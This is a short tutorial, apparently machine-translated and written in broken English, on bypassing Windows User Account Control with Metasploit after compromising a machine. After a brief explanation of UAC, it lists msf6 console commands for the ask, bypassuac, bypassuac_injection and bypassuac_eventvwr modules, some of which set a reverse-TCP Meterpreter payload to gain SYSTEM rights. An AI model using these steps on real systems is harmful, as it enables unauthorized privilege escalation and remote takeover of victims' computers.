Bypass rights

UAC Introduce
UAC It is a technology introduced by Microsoft to improve system security .
UAC Require users to perform operations that may affect the operation of the computer or before making settings that may affect other users ,
Have corresponding permissions or administrator password .UAC Authenticate the user before the operation starts ,
To prevent malicious software and spyware from installing on the computer or modifying the computer settings without permission .
The security control strategy set by Microsoft , Divided into high 、 in 、 Three lower levels .
High level processes have administrator privileges ; Medium level processes have ordinary administrator privileges ; Low level processes , Permission is limited , In order to ensure the minimum damage caused by the security threat to the system .

uac Bypass
For remote execution of the target exe perhaps bat Executable bypasses this security mechanism , This is called BypassUAC（ Run the execution file directly without pop-up window ）

MSF bypassuac Raise the right
When it is obtained that ordinary users cannot use getsystem When it comes to power , Use uac Bypass reuse getsystem You can succeed by raising your rights

RunAs modular
exploit/windows/local/ask
Runas Authorization will create an execution file , A will pop up on the target uac The dialog ,
Clicking is a rebound shell, Can be done getsystem Raise the right .

msf6 exploit(windows/local/ask) > set filename windows.exe
filename => windows.exe
msf6 exploit(windows/local/ask) > set session 1
session => 1
msf6 exploit(windows/local/ask) > run

bypassuac modular
exploit/windows/local/bypassuac
Trusted publisher certificates are bypassed by process injection Windows UAC.
And make sure that the current user is in the administrator user group .uac Default settings can succeed .

msf6 exploit(windows/local/bypassuac) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac) > run

bypassuac_injection modular
This module uses trusted publisher certificates through memory injection to bypass UAC（ The module needs to select the correct architecture ）

msf6 exploit(windows/local/bypassuac_injection) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_injection) > set target  1
target => 1
msf6 exploit(windows/local/bypassuac_injection) > set payload windows/x64/meterpreter/reverse_tcp

bypassuac_eventvwr modular
Hijack the special key in the registry under the current user configuration unit and insert it, which will be launched at startup Windows Time viewer / fodhelper.exe Call custom commands when the application is running to bypass UAC.

msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set target 1
target => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > run